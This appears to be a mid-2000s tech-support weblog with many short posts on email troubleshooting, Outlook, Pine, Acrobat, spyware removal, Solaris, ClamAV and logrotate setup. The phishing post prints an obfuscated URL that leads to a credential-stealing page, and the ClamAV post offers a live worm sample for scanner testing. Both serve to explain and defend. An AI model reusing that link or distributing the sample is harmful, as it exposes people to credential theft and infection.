MoonPoint Support Weblog

The recipient was unavailable to take delivery of the message

A user received a bounced message with the following text when she sent an email:

Your message

   To:      mbgonzalez1@tfm.com.mx
   Subject: Receipt for Mr. Kniestedt
   Sent:    Fri, 17 Dec 2004 13:34:40 -0600

 did not reach the following recipient(s):

 Mayela Gonzalez B. on Fri, 17 Dec 2004 13:35:40 -0600
     The recipient was unavailable to take delivery of the message
       The MTS-ID of the original message is: c=es;a=
 ;p=tfm;l=MAIL0412171935Y7690HBL
     MSEXCH:MSExchangeMTA:TFM_MTY_PO2:TFM_MTY_DOM05

So what does "the recipient was unavailable to take delivery of the message" mean? The email address is correct. Otherwise, the Microsoft Exchange server at the recipient's end would have replied "The recipient name is not recognized". In thise case, I believe it is because the recipient, Mayela Gonzalez, is over her quota for email on the Exchange server.

When a user is over quota and needs to delete some email, most other servers will respond with a message that clearly states the source of the problem, such as "the user has exceeded his quota" or something similar. The message from the Microsoft Exchange server, however, gives no immediately intelligible reason for the problem, but I believe it is because she is over her alloted storage space for messages on that server.

Unfortuntately, I've encountered other cases, also, where Microsoft programs ought to provide you details the program clearly must know, so that you can immediately understand what is causing a problem, but instead they provide some vague message like the one in this bounced message. Why is the user "unavailable to take delivery of the message"? Has she gone to lunch? The program producing the error message must know why it can't deliver the message to her, but doesn't deign to provide the details that would make the source of the problem clear.

References:

VirginiaTech Knowledge Base Article VTKB1005

[/network/email/exchange] permanent link

Viewing Message Headers in Outlook 2002

If you receive a spam message or anti-virus software on your system reports it detected a virus or worm in an incoming message, you can't rely on the "from" address to reveal the true orgination point of the message. It is highly unlikely that such messages actually came from the user listed in the "from" address. Most spammers and mass-mailing worms use spoofed "from" addresses, i.e. addresses that are fictitious, real addresses that were found by a worm scanning an infected system for email addresses, addresses found by spam spiders, which are programs that search the web for valid email addresses posted on websites, or addresses that are likely to be valid on a domain, such as info, information, admin, administrator, root, etc.

Sending a reply message to the "from" address warning the user at that address that his or her system is infected with a virus or to complain about spam will likely be fruitless, since that user never sent you the spam or virus. So how can you determine where the message actually orginated? By looking at the message headers. Most email clients commonly used on Windows systems hide the message headers from users by default, but, commonly, there are ways to still view the message headers.

In Outlook 2002, the procedure is as follows:

Double-click on the message in Outlook to view it.
Click on "View" and then "Options". A "Message Options" window appears with the Internet headers displayed at the bottom of the window.

If you want to copy those headers to an email message or file, click inside the "Internet headers" section, hit the Ctrl and A keys simultaneously to select the entire contents of that section or just click and drag with the mouse to highlight all of the information. Then hit the Ctrl and C keys simultaneously to copy the information into the Windows clipboard. Then inside an email message you are composing or a file you've opened, hit the Ctrl and V keys simultaneously to paste the information into the message or file.

Scrolling through the message headers will reveal the origination point of a message. Don't expect to find an email address associated with the true sender, but the headers will show the Internet Protocol (IP) address of the sending system and path the message took from that system to your system.

[/os/windows/office/outlook] permanent link

Reducing the size of a Portable Document File (PDF) file in Acrobat 6.0

To reduce the size of a PDF file in Adobe Acrobat 6.0, take the following steps:

Click on File.
Click on Reduce File Size.
Select the desired compatibility. You have three options:
- Adobe Acrobat 4.0 and later
- Adobe Acrobat 5.0 and later
- Adobe Acrobat 6.0 and later
Selecting a later version will allow a greater reduction in file size, but will necessitate others viewing the file to have that version. Selecting an earlier version will provide greater compatibility, but a smaller reduction in file size.

When you are working with a PDF file, you can also reduce the size of the file by choosing Save As and then overwriting the file you opened. When you choose Save As, Acrobat will save the file as efficiently as possible, whereas when you choose Save, changes are appended to the file, which may make it larger. Acrobat will also optimize a document for "Fast Web View" when you use Save As, allowing the document to be downloaded one page at a time from a Web server, which will reduce the time it takes to view it.

You can see the size of the file in Acrobat by clicking on File and then Document Properties. Under the "Description" section, in addition to the file size, you will also see the PDF version listed, which will tell you what version of Acrobat others will need to view the file.

References:

Reduce PDF file size

[/os/windows/software/pdf] permanent link

Repairing Outlook PST File Corruption at 2 GB Limit

Outlook 2000 and earlier versions put all messages, attachments, contact lists, the calendar, etc. in one file. There are advantages and disadvantages to that approach. But Microsoft's Outlook developers coded the software in such a way that when that file size nears 2 GigaBytes (GB), the file becomes corrupt. And Outlook provides no forewarning that one is nearing the 2 GB limit. Once you reach about 1.96 GB the file becomes corrupted and you may not even be able to start Outlook.

Microsoft's Inbox Repair Tool, scanpst.exe, can't repair the damage. The only repair mechanism Microsoft provides is the Oversize PST Recovery Tool, PST2GB. That tool will arbitrarily truncate the PST file to less than 2 GB, which then allows it to be repaired with the Inbox Recovery Tool. However, you have no control over what data is removed by the truncation process, so some messages will be lost.

For instructions on how to repair a file that has reached the limit, see Repairing Outlook PST File Corruption at 2 GB Limit

[/os/windows/office/outlook] permanent link

Configuring Pine to Display Message Headers

Pine will show you the "Date", "From", "To", and "Subject" of a message in addition to the message's contents. But you may wish to view the full message headers to see the "Message-ID" or the "Received" headers. The Received headers allow you to view the path of a message from an originating system to your mail server. They are useful in determining if a message actually came from the purported orginator, since spammers and worms often use fake "From" addresses.

Pine allows you to display the full message headers using the "H" command. But, if you hit "H" and you see the message "[Command "h" not defined for this screen. Use ? for help]", then the command hasn't been enabled. To enable the comand so that you can use "H" to toggle the display of full message headers, take the following steps.

At Pine's main menu, which is shown below, hit the "S" key for "Setup".

  PINE 4.33   MAIN MENU                         Folder: INBOX  3,280 Messages


          ?     HELP               -  Get help using Pine

          C     COMPOSE MESSAGE    -  Compose and send a message

          I     MESSAGE INDEX      -  View messages in current folder

          L     FOLDER LIST        -  Select a folder to view

          A     ADDRESS BOOK       -  Update address book

          S     SETUP              -  Configure Pine Options

          Q     QUIT               -  Leave the Pine program




   Copyright 1989-2001.  PINE is a trademark of the University of Washington.

? Help                     P PrevCmd                 R RelNotes
O OTHER CMDS > [ListFldrs] N NextCmd                 K KBLock

At the next menu, shown below, hit the "C" key to configure Pine.

This is the Setup screen for Pine. Choose from the following commands:

(E) Exit Setup:
    This puts you back at the Main Menu.

(P) Printer:
    Allows you to set a default printer and to define custom
    print commands.

(N) Newpassword:
    Change your password.

(C) Config:
    Allows you to set many features which are not turned on by default.
    You may also set the values of many options with that command.

(S) Signature:
    Enter or edit a custom signature which will
    be included with each new message you send.

Scroll down through the list that appears using the cursor keys on your keyboard (or you can move up and down the list with "n" for "next" or "p" for "previous") until you find "enable-full-header-cmd" under "Advanced Command Preferences". When you've found it, hit "x" to set the value ("x" toggles values off and on). Then hit "E" to exit setup. When prompted "Commit changes ("Yes" replaces settings, "No" abandons changes)?", hit "y" to save your changes. Now when you view a message, you can just hit the "h" key to toggle the display of a message's headers on and off.

[/network/email/clients/pine] permanent link

LocalNRD Removal

While running adware/spyware checks on a system today I found Bazooka Scanner reported LocalNRD on the system. I wasn't able to remove it through "Add/Remove Programs", but instead had to manually remove the remnants of this malware. I've created a registry file to remove the registry entries Bazooka associates with this malware and a batch file to remove the file associated with it.

Instructions for removing LocalNRD

[/security/spyware/localnrd] permanent link

AOL Tells Broadband Customers to Find New ISP

The ABC News website has an article today stating that America Online (AOL), (I think Ads Online might be a more accurate name), is telling its broadband customers in nine southern states that it will no longer be able to provide broadband service to them. Customers have until January 17, 2005 to find another broadband provider. If they remain with AOL, they will be converted to AOL's dialup service. And AOL spokesperson Anne Bentley is quoted as stating that she expects AOL will phase out broadband service to the rest of its customers over the next year.

I've read other reports that AOL is experiencing financial problems and a declining subscriber base, which doesn't surprise me. I used to suggest AOL to people who had no prior experience with computers or whose computer knowledge was very limited. And when I was helping a family member run a mailing list devoted to anime, I maintained an AOL account so that I could help mailing list members who were AOL members. Many would join the list, but then be unable to receive email, because their AOL account was configured to block email from addresses outside AOL. With the AOL account, I could send them a message advising them how they could change their AOL settings.

AOL did make it fairly easy to get on-line, chat, and send email even for people who were computer illiterate. But over time, I decided AOL wasn't even a good choice for computer novices. Other ISPs improved the packaging of their service and support for novice users, but didn't bombard users with ads whenever they went on-line. And after dealing with AOL's customer service, I came to the conclusion it was awful.

AOL started popping up ads to create a second AOL account when you went on-line. A family member inadvertently created a second account, though she didn't realize she had done so. When I saw the second billing, I called AOL. I was told a second account had been created. I told the representative I spoke to we didn't want it and I wanted that account canceled. I was told the account was canceled. The next month I was again billed for the second account. I called again and was again assured the account was canceled. The following month I was again billed for a second account. I called again and spoke to an AOL representative who said she was checking on the account and then switched me to a telemarketer when she put me on hold. It was bad enough when they put me on hold and forced me to listen to marketing offers while I was on hold, but getting switched to some telemarketing partner of AOL was infuriating. I called back and demanded to speak to a supervisor. I was told the second account would be deleted, but next month I was again billed. On my next call, I was told that "yes" the second account would finally be deleted, but they couldn't credit my credit card for the billings for the previous months. Instead they would give me a credit for extra months on the first account, which I had switched to AOL's $4.95 limited service, which I only kept to assist mailing list members. Billing for the second account finally stopped, but at that point, I didn't feel I could ever recommend AOL to anyone. And with such lousy customer service, it doesn't surprise me AOL is losing customers. I think AOL's chances of still existing in another five years aren't good.

[/network/Internet/ISP] permanent link

Bubba.WinTools Removal

While running adware/spyware checks on a system tonight, I found Bazooka Scanner reported Bubba.Wintools on the system. I wasn't able to remove it through "Add/Remove Programs", but instead had to manually remove the remnants of this malware. I've created a registry file to remove the registry entries Bazooka associates with this malware and a batch file to remove the files associated with it.

Instructions for removing Bubba.Wintools

[/security/spyware/bubba-wintools] permanent link

SunTrust Banks Scam

I received an email today, purportedly from SunTrust Banks, Inc. which was actually a phishing scam. The message had a "from" address of "Suntrust Bank " and a subject of "SunTrust Bank SECURE VERIFICATION PROCESS". The message had a GIF image, chinaman.GIF embedded in it.

Clicking on the link in the message opens another window where the the mark is expected to fill in the following fields:

ATM/Debit Card
PIN-code
Expiration date
CVV2 (the three-digit code on the back of a credit card)
Login Name
Password
E-mail Address

To view a snapshot of that window, click here or to view the window as activated by the HTML code, click here. Submitting the form yields a "Thank you for confirmation" message.

In Internet Explorer, when you move your cursor over the link in the email message, you see http://www.suntrust.com/personal/Checking/OnlineBanking/Internet_Banking/security.asp, which is a real SunTrust webpage, but the real URL to which you will be taken is shown below:

http://%32%30%33%2e%31%39%38%2e%32%31%30%2e%31%35%36:%38%37/%73%74/%69%6E%64%65%78%2E%68%74%6D

The author of this scam is using an obfuscated URL to make it less likely potential marks will see through the scam. Obfuscated URLs can be unobfuscated using tools provided at various websites. Putting in the above URL at http://javascript.internet.com/equivalents/url-revealer.html reveals a more intelligible URL, http://203.198.210.156:87/s/t/index.htm, which is more obviously not a SunTrust website address.

The source code for the message shows the obfuscation. The HTML code can be downloaded here.

[/security/scams/phishing/suntrust] permanent link

Release of Open-Source Solaris May Not Occur by the End of 2004

Glenn Weinberg, vice president of Sun's operating platforms group, is quoted in a ZDNet article, Open-source details hold up Solaris release as indicating details on Sun's open-source version of Solaris may not be finalized by the end of the year. "It'll be really close," Weinberg told reporters. According to Sun president Jonathan Schwartz, Sun has not ruled out releasing Solaris under a GPL license.

Sun is discussing their plans with open-source representatives at the Open Source Initiative, though Eric Raymond, president of the Open Source Initiative, has stated those communications have been unofficial.

[/os/unix/solaris] permanent link

Open Solaris Getting Closer

There is an article, Sun Ready to Open Solaris, in eWEEK dated November 1, 2004 by Peter Galli stating that Sun is getting closer to releasing Open Solaris, an open-source version of their Solaris operating system. The article states that Sun is starting with a pilot/beta program for Open Solaris. The article also states that Sun is getting close to finalizing pricing for Solaris 10.

Though, in another September 22 eWEEK article, When Open-Source Claims Fall Flat, Steven J. Vaughan-Nichols wonders about when Sun will actually make Open Solaris available. He also implores Sun not to come up with yet another variant of an "open-source" licensing model. He has also written another eWEEK article, Analysts Question Sun's Open-Source Solaris Plans, published in eWEEK on September 21, on the implications of the licensing scheme that Sun may adopt for open Solaris.

He is critical of Microsoft's "shared source" scheme, another effort by Microsoft to combat the open-source movement which threatens its revenue stream.

[/os/unix/solaris] permanent link

Windows XP Keyboard Shortcuts

Keyboard shortcuts available to you in Windows XP include those listed below. Press the Windows logo key , which you will find next to the Alt keys on newer PC keyboards (the Windows logo key doesn't exist on older keyboards) and the listed second key to use the shortcut.

	Open the Start menu
L	Lock the computer, if your computer is a domain member
E	Explore My Computer
M	Minimize all open Windows
F	Open the Search window (think of "F" for "Find")
F1	Open Help and Support Center

[/os/windows/xp] permanent link

HotJava 3.0

I upgraded Netscape on a Solaris 2.7 system only to find that I then would receive a "bus error" message every time I started Netscape. I was unable to find a solution to the problem, so I looked for alternative GUI browsers, but, unfortunately, almost every one I found required version 8 or higher of the Solaris operating system. I thought it might be able to use Mozilla, but the requirements listed for it indicated Solaris 8 or higher is needed.

I tried Opera, but that didn't work. I thought I might even be able to use Internet Explorer on the system. From some websites I visited, it appeared that Microsoft went up to a 5.0 version of Internet Explorer for Unix, but Microsoft is no longer making any Unix version of Internet Explorer available for download.

The system had Sun's HotJava browser on it. But that was version 1.0.2 and it didn't work very well for most websites I visited. Fortunately, Sun does make available a much later version, version 3.0, which will run on the Solaris 2.7 operating system. That version is available from Sun at http://java.sun.com/products/archive/hotjava/3.0/index.html.

To install the software, make the file executable and then run the program from the command line, which will open an InstallAnywhere window.

chmod +x hjb3_0-solsparc-jre.bin hjb3_0-solsparc-jre.bin

When I first attempted to install the software, I had logged into the system under a user account and then used su to become root from a terminal console window. I would see "InstallAnywhere is preparing to install..." appear and then the installation would appear to hang. When I logged out and back in as root and ran the program again, I saw the window appear that allowed me to proceed with the installation.

If you accept the default installation directory, the program will be installed in /HotJava. Sun reports there is a bug that may affect you if you choose an alternate installation directory:

(Solaris systems) If you run the install program as root, and the default install location (/HotJava) does not already exist, the "Select a Folder" dialog box for choosing a different install folder does not come up when you click the Choose button. At this point, the Choose button becomes permanently disabled. You can continue the installation in either the default /HotJava directory or in an alternate directory you type in the text field containing the default installation directory. (bug id 4229644)

If you chose the default installation directory, you can run the program by typing /HotJava/hotjava. If you just type hotjava, you will still get the older version, which is in /usr/dt/bin/hotjava, unless you set up a symbolic link or alias to point to the new version.

One serious limitation of the browser is that it does not support secure connections using the https protocol. So you will not be able to use it to access any webpages requiring secure transmission of data between a browser and a web server. I installed a fairly old version of Netscape Communicator, version 4.05, which Sun provided with Solaris 7, to be able to access secure webpages. The browser also can't display png images.

[/os/unix/solaris] permanent link

Dell Recalls Laptop Power Adatpters

Dell is recalling power adapters for some of its Latitude, Precision, and Inspiron laptops due to the possibility that the adapters may overheat, posing a risk of fire or electrical shock. The adapters being recalled have "P/N 9364U," P/N 7832D" or "P/N 4983D" and Dell's name on them. Dell is offering a free replacement adapter for the defective adapters. See CPSC, Dell Inc. Announce Recall of AC Adapters for Notebook Computers or www.delladapterprogram.com for further details, though the latter site is returning a "Service Unavailable" message at the moment.

There was a prior recall of Dell Combination Auto/Air Adapters sold with Dell Latitude X300, D400, D500, D505, D600 and D800, Inspiron 300m, 500m, 510M, 600m, I8500, I8600 and Precision M60 laptops sold between December 2003 and May 2004. Those adapters pose the risk of electrical shock to users. Those adapters have "DELL" and "Dell P/N W1451" printed on the top of the adapters. For details on that recall see www.auto-air-adapter.com or the Dell Combination Auto-Air Power Adapter Retrofit Program webpage.

References:

Part Numbers 9364U, 7832D, and 4983D Recall

Part Number W1451 Recall

[/pc/hardware/power-supply] permanent link

Jubril Udeh Scam

I received a variant of the "pose as some deceased tycoon's next of kin and get rich" email messages today. This one purports to be from "Jubril Udeh Manager of Credit and Accounts Department of North Atlantic Securities Sarls Lome-Togo Republic" in regards to millions that belonged to the now deceased "Mr Levy Shimony a Lebanese Import and Export Tycoon here in Lome Togo." The message was purportedly sent to me because of my "high repute and trust worthiness", characteristics one supposes make me an ideal partner for participating in a fraudlent scheme where I would pose as the deceased's next of kin.

Are there people foolish enough to fall for such ruses? Unfortunately, the answer is "yes". There have apparently been quite a few people who have fallen for such scams. One I read about was an accountant for a law office who used her employer's funds to cover the scammer's "transaction fees". She apparently thought she could cover the money she took from her employer out of the large sum of money she was sure to receive. What she did receive was a prison sentence, since, of course, no funds were forthcoming from the scammer.

One recipient of one of these messages decided to scam the scammer. He actually got the scammer to send him money, which he donated to charity. For an amusing tale of how this scambaiter got the scammer to join his "Holy Church of The Order of The Red Breast", see The Tale of The Painted Breast.

[/security/scams] permanent link

Example Virus Messages

Examples of messages containing various worms, viruses, and trojans.

[/security/viruses] permanent link

BHODemon

Adware/spyware may insert itself on your system using a Browser Helper Object (BHO). One tool that can show you the BHOs that are enabled on your system is BHODemon from Definitive Solutions.

See Installing and Using BHODemon for additional download links and information on installing and using the program.

[/security/spyware] permanent link

Clam Antivirus (ClamAV)

A free antivirus package for Linux systems, Clam Antivirus, is available from http://www.clamav.net/.

I downloaded the Clam AntiVirus package with wget http://crash.fce.vutbr.cz/crash-hat/2/clamav/clamav-0.75.1-1.i386.rpm. I then installed the package on a mail server running Fedora Core 2 Linux.

rpm --install clamav-0.75.1-1.i386.rpm warning: clamav-0.75.1-1.i386.rpm: V3 DSA signature: NOKEY, key ID 6cdf2cc1

The warning message can be prevented by using the command rpm --import http://crash.fce.vutbr.cz/Petr.Kristof-GPG-KEY prior to installing the package.

To use up2date to update the package, add the lines below to /etc/sysconfig/rhn/sources if you are using Fedora Core 1. You can add them after the other yum lines:

yum crash-hat http://crash.fce.vutbr.cz/crash-hat/1 #yum crash-test http://crash.fce.vutbr.cz/crash-hat/testing/1

If you are using Fedora Core 2, use the lines below:

yum crash-hat http://crash.fce.vutbr.cz/crash-hat/2 #yum crash-test http://crash.fce.vutbr.cz/crash-hat/testing/2

Otherwise, you will get the error message below when you try up2date clamav:

The following packages you requested were not found: clamav

Once you have added the line to /etc/sysconfig/rhn/sources, you can then use up2date -u clamav to update the software to a later version when one becomes available.

If you are using another version of Linux, see http://www.clamav.net/binary.html#pagestart for information. Clam AntiVirus will run on other operating systems as well. Supported platforms are listed below (tested platforms in parentheses):

GNU/Linux - all versions and platforms
Solaris - all versions and platforms
FreeBSD - all versions and platforms
OpenBSD 3.0/1/2 (Intel/SPARC)
AIX 4.1/4.2/4.3/5.1 (RISC 6000)
HPUX 11.0
SCO UNIX
IRIX 6.5.20f
Mac OS X
BeOS
Cobalt MIPS boxes (RAQ1, RAQ2, QUBE2)
Windows/Cygwin
Windows Services for Unix 3.5 (Interix)

Some features may not be available on all operating systems.

If you install the package with the rpm or up2date commands, a new group and a new user account will be created, both named clamav. The clamav configuration file will be located in /etc/clamav.conf. The virus database updater program is called "freshclam". Freshclam's configuration file is /etc/freshclam.conf. You can control how often freshclam checks for new virus signatures by adjusting the Checks value in the /etc/freshclam.conf file. The log file for clamav is /var/log/clamav/clamd.log and the log file for freshclam is in /var/log/clamav/freshclam.log.

The program doesn't start automatically when you install it with the rpm or up2date commands. You can start it with /etc/init.d/clamd start or by rebooting the system.

If you left the TCP listening port to be the default of 3310, you can see whether it is running by using the netstat command netstat -at | grep 3310. You should see the system is listening for connections on that port.

tcp        0      0 *:3310                  *:*                     LISTEN

Or you can use the ps command to check on whether it is running:

[root@mail root]# ps aux | grep clamd | grep -v "grep"
clamav    2315  0.0  6.1 18024 15628 ?       S    00:13   0:00 /usr/sbin/clamd

You can use the clamscan command to scan a directory or file for viruses. E.g. a scan of the files in the directory where clamav test files are stored might produce output such as that shown below:

[root@mail root]# clamscan /usr/share/doc/clamav-0.75.1/test /usr/share/doc/clamav-0.75.1/test/test-failure.rar: RAR module failure /usr/share/doc/clamav-0.75.1/test/test-failure.rar: OK /usr/share/doc/clamav-0.75.1/test/README: OK /usr/share/doc/clamav-0.75.1/test/test.bz2: ClamAV-Test-Signature FOUND /usr/share/doc/clamav-0.75.1/test/test.zip: ClamAV-Test-Signature FOUND /usr/share/doc/clamav-0.75.1/test/test-zip-noext: ClamAV-Test-Signature FOUND /usr/share/doc/clamav-0.75.1/test/test.msc: ClamAV-Test-Signature FOUND /usr/share/doc/clamav-0.75.1/test/test.rar: ClamAV-Test-Signature FOUND /usr/share/doc/clamav-0.75.1/test/test: ClamAV-Test-Signature FOUND ----------- SCAN SUMMARY ----------- Known viruses: 24009 Scanned directories: 1 Scanned files: 8 Infected files: 6 Data scanned: 0.00 MB I/O buffer size: 131072 bytes Time: 5.640 sec (0 m 5 s)

The files in the clamav test directory are actually harmless, but the scan shows you the clamav scanning program is working. If you want to test with an actual worm, you can use the following example of Worm.SomeFool.P, aka W32.Netsky.P@mm.

Worm.SomeFool.P

If you want to scan just a particular file, you can use put the file name after the command, e.g. clamscan corrected_doc.pif.

If you wish to manually update the virus defintions, issue the command freshclam.

Clam AntiVirus 0.75.1-1 Package and Download Information

Milter package for use with sendmail
Clam AntiVirus 0.75.1-1 Milter Package and Download Information

[/security/antivirus/clamav] permanent link

Logrotate PPP Error

After first setting up a Linux server with Fedora Core 2 Linux, I received the following error message in an email message sent to root:

Date: Sun, 12 Sep 2004 19:00:42 -0400
From: root@mail.somewhere001.us (Anacron)
To: root@mail.somewhere001.us
Subject: Anacron job 'cron.daily'

/etc/cron.daily/logrotate:

error: stat of /var/log/ppp/connect-errors failed: No such file or directory

According to Bugzilla Bug 126771: logrotate error because of non-existent /var/log/ppp/connect-errors this error can be prevented by adding a missingok to /etc/logrotate.d/ppp. The problem occurs if PPP isn't used, which means there won't be a log file for it in /var/log/ppp. By adding the missingok to /etc/logrotate.d/ppp, you indicate that an error message shouldn't be produced if the log file is missing and so can't be rotated.

According to Bug 122911 - Logrotate problem if ppp isn't used and there isn't a logfile in /var/log, the problem is present in version 2.4.2 release 2 of the ppp package. I didn't add the missingok line, but instead upgraded the ppp package (use up2date --install ppp). I now have version 2.4.2 release 3.FC2.1 of ppp, which added the missingok line.

# Logrotate file for ppp RPM

/var/log/ppp/connect-errors {
        missingok
        compress
        notifempty
        daily
        rotate 5
        create 0600 root root
}

[/os/unix/linux/sysmgmt] permanent link

Daily Rotation of Mail Logs

For a Linux mail server I set up, I want to have sendmail's log file, which is /var/log/maillog, rotated daily rather than once a week. With the default setting for logrotate, the file maillog will be closed and become maillog.1 after a week. If there is a maillog.1 it becomes maillog.2, etc. I want this to occur at midnight every night. To achieve the daily rotation, log in under the root account and edit the file /etc/logrotate.d/syslog, removing /var/log/maillog from the line where it is listed with all of the other log files that get rotated. Then create a new logrotate control file, e.g. /etc/maillogrotate.conf. Don't put it in the /etc/logrotate.d directory. My maillogrotate.conf file contains the following lines:

# Begin maillogrotate control file
/var/log/maillog {
   daily
   rotate 14
   sharedscripts
   create 0600 root root
   missingok
   postrotate
   /bin/kill -HUP `cat /var/run/syslogd.pid 2> /dev/null` 2> /dev/null || true
   endscript
}
# End maillogrotate control file

The meaning of the lines is as follows:

Comment
Specifies the file to be rotated, /var/log/maillog
Indicates the file should be rotated on a daily basis
rotate 14 indicates 14 previous versions (2 weeks worth of logs) should be kept, i.e. there will be a maillog file as well as maillog.1 through maillog.14
sharedscripts means that the postrotate script will only be run once, not for every file that is rotated.
create 0600 root root indicates that immediately after logrotate has rotated the file, it should create a new file with the same name as the one just rotated, in this case maillog. The permissions for the file, 0600, indicate that the owner will have read and write access to the file, but no one else will be given any access to the file. After access is specified, the owner and group for the file are each set to root (the format is create mode owner group.
missingok indicates that if the log file is missing, proceed to the next one without issuing an error message.
Any lines between postrotate and endscript will be executed after the rotation is completed. In this case, the syslog process will be restarted. The process id for syslog is stored in /var/run/syslog.pid, so cat /var/run/syslogd.pid displays the contents of syslogd.pid. The 2> /dev/null at the end indicates that STDERR (error messages) will be redirected to /dev/null, which means that they are discarded. The backticks around this command (be certain to use the ` character, which is on the key to the left of the 1 key not the single quote, ' here) mean take the output of this command and use it as an argument to /bin/kill -HUP, which kills the syslog process, which will get automatically restarted. The second 2> /dev/null means that any error messages generated from the kill command are also discarded. The || true at the end means that if there is a problem with the kill command then still mark this part of the script as successful, i.e. don't abort with an error message. The || means "or" and true always returns a successful exit status.

You then need to create a crontab entry with crontab -e. This will open the crontab file in the vi editor. The crontab file can be used to run commands on a scheduled basis. Hit the i key to put the vi editor in insert mode then type the following command:

0 0 * * * /usr/sbin/logrotate /etc/maillogrotate.conf 1>/dev/null 2>/dev/null

Then hit the : (colon) key and type wq to save the file and exit from the editor.

The crontab file consists of 6 fields:

minute	A number from 0 to 59 indicating the minute the command will run
hour	A number from 0 to 23 indicating the hour for the command to be run
day of month	A number from 1 to 31 indicating the day of the month to run the command
month	A number from 1 to 12 indicating the month to run the command
day of week	A number from 0 to 6 (Sunday to Saturday) for the command to be run
command	The command to be run

So the listed crontab entry will run the /usr/sbin/logrotate program at midnight every day (the asterisks means use all possible values for the field). The logrotate program will use the file I created, /etc/maillog.conf, to determine what it should do. Any output, whether standard output or error messages, are sent to /dev/null, i.e. discarded.

In addition to keeping two weeks worth of logs in the /var/log/maillog directory, I like to archive mail logs in a separate directory to be parsed by statistics generation programs. If I add new programs, I can run them on all the old log files to generate statistics for the entire year. So I create a /root/maillog directory to hold the maillog files and a program, copy-maillog, which will copy the previous day's maillog to that directory with that day's date appended to the filename. I place the copy-maillog file in /root/bin and make it executable.

mkdir /root/maillog mkdir /root/bin

The copy-maillog program contains the following lines:

#!/bin/bash cp -a /var/log/maillog.1 /root/maillog/maillog.$(date --date=yesterday +%m%d%y)

This will copy the previous day's maillog file, maillog.1 to the /root/maillog/ directory. The $(date --date=yesterday +%m%d%y) extension means append yesterday's date formated as month, day, year, e.g. maillog.091604 for the September 16, 2004 mail log file.

To make the script executable, type chmod 700 copy-maillog.

I then create a crontab entry to run copy-maillog script at half past midnight every night. Use crontab -e again to edit the crontab file, then move the cursor to the end of the file and hit the a key to append data after the cursor. Hit the enter key to start a new line and insert the following:

30 0 * * * /root/bin/copy-maillog 1>/dev/null 2>/dev/null

Then hit the Esc key followed by the colon key. Type wq to save the modifications to the crontab file and exit from the editor. If you then type crontab -l to list the contents of the crontab file, you shold see something similar to the following:

[root@mail bin]# crontab -l # DO NOT EDIT THIS FILE - edit the master and reinstall. # (/tmp/crontab.8726 installed on Fri Sep 17 18:27:16 2004) # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) 0 0 * * * /usr/sbin/logrotate /etc/maillogrotate.conf 1>/dev/null 2>/dev/null 30 0 * * * /root/bin/copy-maillog 1>/dev/null 2>/dev/null

References:

How to rotate maillogs daily on RedHat

[/network/email/sendmail] permanent link

Bandwidth Monitoring on a Linux System

On a Linux system, if you need information on how much bandwidth is being used and what type of traffic is consuming the bandwidth, two tools you can use that don't require a Graphical User Interface (GUI) are IPTraf and Linux Bandwidth Monitor (bwmon).

IPTraf description from Red Hat's IPTraf package:

IPTraf is a console-based network monitoring utility. IPTraf gathers data like TCP connection packet and byte counts, interface statistics and activity indicators, TCP/UDP traffic breakdowns, and LAN station packet and byte counts. IPTraf features include an IP traffic monitor which shows TCP flag information, packet and byte counts, ICMP details, OSPF packet types, and oversized IP packet warnings; interface statistics showing IP, TCP, UDP, ICMP, non-IP and other IP packet counts, IP checksum errors, interface activity and packet size counts; a TCP and UDP service monitor showing counts of incoming and outgoing packets for common TCP and UDP application ports, a LAN statistics module that discovers active hosts and displays statistics about their activity; TCP, UDP and other protocol display filters so you can view just the traffic you want; logging; support for Ethernet, FDDI, ISDN, SLIP, PPP, and loopback interfaces; and utilization of the built-in raw socket interface of the Linux kernel, so it can be used on a wide variety of supported network cards.

A ZDNet article, Police your network traffic with IPTraf explains how to use IPTraf to log and monitor IP traffic on your system.

You can download IPTraf from the developer's website or you may already have it with your distribution of Linux. An RPM is available from Red Hat or from this site.

The options when running bwmon are shown below:

Linux Network Bandwidth Monitor $Revision: 1.3 $
by Kimmo Nupponen (kimmoon@users.sourceforge.net)
$Date: 2002/05/08 06:33:09 $

usage: bwmon [-b] [-h] [-a] [-m] [-u seconds]
        -a Print bandwidth utiliasation in Kbytes rather than Kbits. The default
           is to use Kbits
        -a Print also average bandwidth since last boot per interface
        -m Print maximum bandwidth since launch of this utility
        -h Print this help message
        -u Update timeout (integer value)

        Use <space-bar> to refresh the screen before update timeout expires
        Use 'q' or 'Q' to exit this utility

Note that you have to have proc mounted to allow this software
to work!

bwmon Screenshot
IPTraf Screenshots

[/os/unix/linux/network] permanent link

Feature Comparison Between Adobe Acrobat 6.0 Standard and Professional

A chart is available at http://www.adobe.com.au/events/roadshows/pdfs/FeatureComparision.pdf comparing the features found in Adobe Acrobat 6.0 Standard and Professional versions. The chart also covers Adobe Reader 6.0 and Acrobat Elements 6.0.

[/os/windows/software/pdf] permanent link

Painting Plastic

If you want to paint cases, parts, or most plastics, you can use Fusion paint from Krylon. The paint dries in 15 minutes or less.

The paint comes in the following colors:

Almond - 2437
Black - 2421
Blonde Shimmer - 2339
Blue Hyacinth - 2333
Burgundy - 2325
Burgundy - 2425
Buttercream - 2334
Dover White - 2322
Dover White - 2422
Espresso - 2340
Espresso - 2436
Fairytale Pink - 2331
Gloss Black - 2321
Gloss White - 2320
Honeydew - 2335
Hunter Green - 2324
Hunter Green - 2424
Khaki - 2438
Navy - 2326
Navy - 2426
Nickel Shimmer - 2338
Patriotic Blue - 2329
Pewter Gray - 2439
Pumpkin (Safety) Orange - 2337
Red Pepper - 2328
River Rock - 2323
River Rock - 2423
Spring Grass - 2327
Sun Dried Tomato - 2332
Sunbeam - 2330
Twilight - 2440
White - 2420

ZDNet's Brian Cooley reports it worked well on his Teo 300 cellphone in his September 9, 2004 entry in Dealing with technology in real life column.

[/pc/hardware/miscellaneous] permanent link

Blosxom Calendar Plugin

A plugin to add a calendar to a Blosxom blog is available from Mt. Molelog or from here.

When I first installed the plugin, I received an "Error 500" error from my blog's webpage with the error message "Premature end of script headers: blosxom.cgi". The webpage loaded correctly once I changed the ownership of the state directory, which lies beneath the plugins directory. I used the following commands to change the user and group for the directory:

chown apache state chgrp apache state

I used apache as the owner and group, since my web server runs Apache webserver software. I could also have used chmod 777 to make the directory world writable, but that would be much less secure, since anyone else on the system could then have write access to the directory.

[/network/web/blogging/blosxom] permanent link

No PTR Record

